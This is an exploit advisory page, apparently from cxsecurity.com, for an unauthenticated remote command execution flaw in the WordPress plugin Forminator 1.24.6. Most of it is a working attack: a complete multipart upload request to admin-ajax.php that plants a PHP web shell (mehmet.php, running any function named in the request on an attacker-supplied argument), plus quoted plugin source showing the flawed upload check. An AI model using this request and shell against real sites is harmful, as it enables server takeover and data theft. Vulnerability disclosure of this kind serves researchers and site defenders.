WordPress Plugin Forminator 1.24.6 Unauthenticated Remote Command Execution

2023.08.24
Credit: Mehmet Kelepçe
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution # Date: 2023-07-20 # Exploit Author: Mehmet Kelepçe # Vendor Homepage: https://wpmudev.com/project/forminator-pro/ # Software Link: https://wordpress.org/plugins/forminator/ # Version: 1.24.6 # Tested on: PHP - Mysql - Apache2 - Windows 11 HTTP Request and vulnerable parameter: ------------------------------------------------------------------------- POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 1756 sec-ch-ua: Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTmsFfkbegmAjomne X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wp-settings-time-1=1689794282; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR Connection: close . . . . . ------WebKitFormBoundaryTmsFfkbegmAjomne Content-Disposition: form-data; name="postdata-1-post-image"; filename="mehmet.php" Content-Type: application/octet-stream <?php $_GET['function']($_GET['cmd']); ?> Source Code: wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php: -------------------------------------------------------------------- public function has_upload() { $fields = $this->get_fields(); if ( ! empty( $fields ) ) { foreach ( $fields as $field ) { if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) { return true; } } } return false; } Vulnerable parameter: postdata-1-post-image and Source code: wp-content/plugins/forminator/library/fields/postdata.php: ------------------------------------------------------------------- if ( ! empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) { if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty( $_FILES[ $image_field_name ]['name'] ) ) { $file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] ); $valid = wp_check_filetype( $file_name ); if ( false === $valid['ext'] || ! in_array( $valid['ext'], $this->image_extensions ) ) { $this->validation_message[ $image_field_name ] = apply_filters( 'forminator_postdata_field_post_image_nr_validation_message', esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ), $id ); } } } Vulnerable function: $image_field_name ------------------------------------------------------------------------- Payload file: mehmet.php <?php $_GET['function']($_GET['cmd']); ?> -------------------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top